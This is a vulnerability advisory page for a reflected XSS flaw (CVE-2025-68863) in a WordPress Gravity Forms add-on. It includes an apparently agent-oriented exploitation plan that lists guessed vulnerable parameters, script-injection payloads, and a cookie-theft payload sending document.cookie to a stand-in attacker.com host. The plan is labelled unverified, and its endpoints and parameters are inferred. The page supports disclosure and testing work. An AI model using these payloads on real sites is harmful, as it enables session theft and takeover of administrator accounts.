WP-Safety
CVE-2025-68863

iContact for Gravity Forms <= 1.3.2 - Reflected Cross-Site Scripting

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.1
CVSS Score
6.1
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The iContact for Gravity Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.3.2
PublishedFebruary 5, 2026
Last updatedFebruary 9, 2026
Affected plugingravity-forms-icontact
Research Plan
Unverified

This research plan targets a Reflected Cross-Site Scripting (XSS) vulnerability in the **iContact for Gravity Forms** plugin (version <= 1.3.2). Since source files are not provided, this plan is based on the vulnerability description and standard patterns found in Gravity Forms Add-ons. We will tr…

Show full research plan

This research plan targets a Reflected Cross-Site Scripting (XSS) vulnerability in the iContact for Gravity Forms plugin (version <= 1.3.2).

Since source files are not provided, this plan is based on the vulnerability description and standard patterns found in Gravity Forms Add-ons. We will treat the exact vulnerable parameter as a target for discovery during the initial phase.

1. Vulnerability Summary

The vulnerability is a Reflected Cross-Site Scripting (XSS). It occurs because the plugin accepts user-controlled input via HTTP parameters (likely GET or POST) and reflects that input back into the HTML response without sufficient sanitization (e.g., sanitize_text_field) or output escaping (e.g., esc_html, esc_attr).

In the context of a Gravity Forms Add-on, this typically happens in the admin settings area where parameters used for tabs, pagination, or status messages are echoed back to the user.

2. Attack Vector Analysis

  • Endpoint: The most likely vulnerable endpoints are:
    1. The Add-on settings page: /wp-admin/admin.php?page=gf_settings&addon=iContact (or similar slug).
    2. The iContact feed list/edit page: /wp-admin/admin.php?page=gf_edit_forms&view=settings&subview=icontact.
    3. A wp_ajax_ or wp_ajax_nopriv_ action that returns an error message containing the input.
  • Vulnerable Parameter (Candidates): subview, view, id, message, s (search), or error.
  • Authentication: The attacker is unauthenticated (remote), but the victim must be a logged-in user (typically an Administrator) who clicks a malicious link prepared by the attacker.
  • Preconditions: The plugin "iContact for Gravity Forms" must be active. Gravity Forms (core) must also be active.

3. Code Flow (Inferred)

  1. Entry Point: A user accesses a URL containing a malicious parameter (e.g., ...&message=<script>alert(1)</script>).
  2. Plugin Processing: The plugin's admin page handler (likely extending GFAddOn) retrieves the parameter directly from $_GET or $_REQUEST.
  3. Vulnerable Sink: The code performs an action like:
    echo '<div class="updated"><p>' . $_GET['message'] . '</p></div>';
    or
    printf( __('Error: %s', 'gravity-forms-icontact'), $_GET['error'] );
  4. Rendering: The browser receives the unescaped script tags and executes them in the context of the victim's session.

4. Nonce Acquisition Strategy

Reflected XSS via GET parameters on admin pages often does not require a nonce because the vulnerability exists in the display logic of the page itself, which executes before or regardless of CSRF checks on actions.

However, if the reflection occurs inside a form or an AJAX response:

  1. Identify Script Localization: Search the page source for wp_localize_script data related to iContact.
  2. Variable Name: Look for a global object, likely gform_icontact_config or similar.
  3. Execution Agent Task:
    • Navigate to the iContact settings page: browser_navigate("/wp-admin/admin.php?page=gf_settings&addon=iContact").
    • Use browser_eval("window.gform_icontact_config") to inspect for nonces if needed for deeper interaction.

5. Exploitation Strategy

The agent should follow these steps to identify and exploit the reflection:

Step 1: Discovery of Reflection Points
Navigate to the plugin's admin pages and look for parameters that are reflected in the source.

  • URL 1: /wp-admin/admin.php?page=gf_settings&addon=iContact&test_param=REFLECTED_CANARY
  • URL 2: /wp-admin/admin.php?page=gf_edit_forms&view=settings&subview=icontact&test_param=REFLECTED_CANARY

Step 2: Construct the Payload
Once a reflected parameter is found, test for HTML injection:

  • Basic Alert: <script>alert(window.origin)</script>
  • Attribute Breakout: "><script>alert(1)</script>
  • Event Handler (if reflected in attribute): x" onmouseover="alert(1)

Step 3: Execute the Exploit (Simulated)
Since this is Reflected XSS, the "exploit" is the URL itself.

  • Target URL: http://localhost:8080/wp-admin/admin.php?page=gf_settings&addon=iContact&message=<script>alert(document.domain)</script>
  • Method: http_request (GET) or browser_navigate.

Step 4: Demonstrate Impact
To prove CVSS 6.1 (Medium), demonstrate the ability to read sensitive data (like nonces) or perform a background action (like creating a new admin).

  • Payload (Cookie Theft): <script>fetch('http://attacker.com/log?c=' + document.cookie)</script>
  • Payload (Nonce Extraction): <script>alert('Your REST nonce is: ' + wpApiSettings.nonce)</script>

6. Test Data Setup

  1. Install/Activate Plugins:
    • wp plugin install gravityforms --activate (Ensure a version is available in the test environment).
    • wp plugin install gravity-forms-icontact --version 1.3.2 --activate.
  2. Configure Admin User: Ensure a standard admin user exists (default admin / password).
  3. Mock Settings (If needed): Some admin pages only display if the plugin is "configured".
    • wp option update gf_icontact_settings '{"api_key":"12345"}' --format=json (Inferred option name).

7. Expected Results

  • The http_request or browser_navigate to the malicious URL should return a response body containing the raw, unescaped payload: <script>alert(document.domain)</script>.
  • In the browser, an alert box should trigger, or the browser_eval should confirm the script was added to the DOM.

8. Verification Steps

  1. Manual Source Check: Use curl or http_request to fetch the page with the canary and check if the canary is wrapped in any escaping functions.
    # Search for the canary in the response
grep "REFLECTED_CANARY" response.html
  2. Verify No Sanitization: Confirm that characters like < and > are not converted to &lt; and &gt;.

9. Alternative Approaches

If the settings page is not vulnerable, check the following:

  • Gravity Forms Feed URLs: Gravity forms allows editing specific "feeds". The URL usually looks like ?page=gf_edit_forms&view=settings&subview=icontact&id=1. Test if the id parameter is reflected.
  • Bulk Actions: Check if a GET parameter like ids or processed is reflected after a bulk action is performed.
  • Error Strings: Trigger an error (e.g., invalid API key) and see if the invalid key is reflected in the error notice.
  • Frontend Shortcodes: Check if the plugin provides a shortcode that reflects attributes.
    • Search: grep -r "add_shortcode" .
    • Test: [icontact_shortcode param="<script>alert(1)</script>"] (if it exists).
References
https://www.wordfence.com/threat-intel/vulnerabilities/id/78391643-6625-4f5b-a08d-3d8462292a1e?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database